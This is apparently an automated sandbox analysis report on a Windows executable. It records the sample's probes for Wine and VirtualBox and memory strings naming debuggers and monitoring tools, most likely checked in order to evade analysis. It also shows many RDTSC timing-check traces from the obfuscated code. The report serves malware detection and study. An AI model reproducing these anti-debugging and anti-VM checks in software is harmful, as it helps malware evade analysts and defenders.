Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B2DBD second address: 14B2DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F8C6CC64788h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B2DD1 second address: 14B2DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B34D7 second address: 14B34DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B364C second address: 14B3666 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B37C1 second address: 14B37CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8C6CC64786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B42D0 second address: 14B42D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14B619F second address: 14B61B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push edi 0x0000000a jmp 00007F8C6CC6478Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB453 second address: 14BB468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB468 second address: 14BB477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB477 second address: 14BB481 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB8FF second address: 14BB903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BB903 second address: 14BB91F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8C6D17D0B0h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BA994 second address: 14BA99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BBBE6 second address: 14BBBEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BBBEC second address: 14BBBF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14BCF4A second address: 14BCF4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C1FEF second address: 14C1FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C1FF7 second address: 14C1FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C1FFD second address: 14C2026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C6CC64797h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C2026 second address: 14C2030 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C6D17D0B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C2A4C second address: 14C2A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C2A56 second address: 14C2A60 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C2A60 second address: 14C2A6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6252 second address: 14C6257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6257 second address: 14C625D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6900 second address: 14C6906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6906 second address: 14C690C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C690C second address: 14C696E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8C6D17D0B4h 0x00000011 xchg eax, ebx 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F8C6D17D0A8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F8C6D17D0AEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C696E second address: 14C6974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CA7 second address: 14C6CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CAB second address: 14C6CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CAF second address: 14C6CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F8C6D17D0A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CC1 second address: 14C6CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6CC7 second address: 14C6CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C6D17D0B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C6EBB second address: 14C6ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC6478Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C74D7 second address: 14C7556 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F8C6D17D0A6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jl 00007F8C6D17D0A6h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F8C6D17D0A8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f jmp 00007F8C6D17D0B2h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F8C6D17D0A8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 mov edi, dword ptr [ebp+122D38E9h] 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 jng 00007F8C6D17D0A6h 0x0000005f pop eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 pop esi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C7EB0 second address: 14C7EE9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F8C6CC64786h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, ecx 0x00000011 push 00000000h 0x00000013 xor dword ptr [ebp+12466AE4h], esi 0x00000019 and esi, dword ptr [ebp+122D2D1Dh] 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 pop esi 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F8C6CC6478Eh 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f pop edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C997D second address: 14C99C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov esi, dword ptr [ebp+122D2F78h] 0x00000012 push 00000000h 0x00000014 jno 00007F8C6D17D0B4h 0x0000001a push 00000000h 0x0000001c mov si, di 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8C6D17D0ABh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C99C5 second address: 14C99CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C99CB second address: 14C99CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D095F second address: 14D0963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14CACCA second address: 14CACCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14CACCE second address: 14CACD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14CACD4 second address: 14CACF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F8C6D17D0B1h 0x00000011 jmp 00007F8C6D17D0ABh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D3B2D second address: 14D3B34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D3B34 second address: 14D3B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D3B42 second address: 14D3B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D3B46 second address: 14D3B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D697D second address: 14D699B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F8C6CC64795h 0x0000000f jmp 00007F8C6CC6478Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D2B17 second address: 14D2B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D924A second address: 14D9254 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C6CC64786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D9254 second address: 14D925A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D4B68 second address: 14D4BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F8C6CC64792h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D2603h] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov dword ptr [ebp+122D3328h], ecx 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F8C6CC64788h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov eax, dword ptr [ebp+122D0E3Dh] 0x00000048 push 00000000h 0x0000004a push ecx 0x0000004b call 00007F8C6CC64788h 0x00000050 pop ecx 0x00000051 mov dword ptr [esp+04h], ecx 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc ecx 0x0000005e push ecx 0x0000005f ret 0x00000060 pop ecx 0x00000061 ret 0x00000062 push FFFFFFFFh 0x00000064 sub dword ptr [ebp+122D3305h], edx 0x0000006a push eax 0x0000006b push edi 0x0000006c push eax 0x0000006d push edx 0x0000006e push edx 0x0000006f pop edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DB266 second address: 14DB26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D5C48 second address: 14D5C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC347 second address: 14DC34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC34B second address: 14DC354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6AEE second address: 14D6AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D93B1 second address: 14D93B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6AF2 second address: 14D6B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6B0F second address: 14D6B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DD287 second address: 14DD28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DA387 second address: 14DA3EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C6CC64786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c pushad 0x0000000d mov dword ptr [ebp+122D3601h], edx 0x00000013 popad 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov ebx, dword ptr [ebp+122D38EDh] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F8C6CC64788h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 cmc 0x00000043 mov eax, dword ptr [ebp+122D0A8Dh] 0x00000049 sub dword ptr [ebp+122D34A7h], edx 0x0000004f push FFFFFFFFh 0x00000051 mov bx, FFE1h 0x00000055 mov edi, dword ptr [ebp+122D2B95h] 0x0000005b nop 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D9472 second address: 14D94AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F8C6D17D0C7h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8C6D17D0B5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC48D second address: 14DC491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6B15 second address: 14D6B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F8C6D17D0B0h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DA3EF second address: 14DA3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC491 second address: 14DC537 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cmc 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr [ebp+122D2E03h], eax 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov dword ptr [ebp+12469FF4h], ecx 0x00000029 mov eax, dword ptr [ebp+122D0B0Dh] 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F8C6D17D0A8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 add dword ptr [ebp+1245B9D0h], edi 0x0000004f jmp 00007F8C6D17D0B4h 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push eax 0x00000059 call 00007F8C6D17D0A8h 0x0000005e pop eax 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 add dword ptr [esp+04h], 0000001Dh 0x0000006b inc eax 0x0000006c push eax 0x0000006d ret 0x0000006e pop eax 0x0000006f ret 0x00000070 cld 0x00000071 nop 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F8C6D17D0B4h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6B28 second address: 14D6BAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F8C6CC64788h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 sub bh, FFFFFFC1h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b jo 00007F8C6CC64788h 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 call 00007F8C6CC6478Fh 0x0000003d mov bx, cx 0x00000040 pop edi 0x00000041 mov eax, dword ptr [ebp+122D0DADh] 0x00000047 push FFFFFFFFh 0x00000049 call 00007F8C6CC64796h 0x0000004e call 00007F8C6CC6478Dh 0x00000053 pop ebx 0x00000054 pop edi 0x00000055 nop 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 push edx 0x0000005a pop edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE3D8 second address: 14DE3FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F8C6D17D0B8h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC537 second address: 14DC550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64792h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
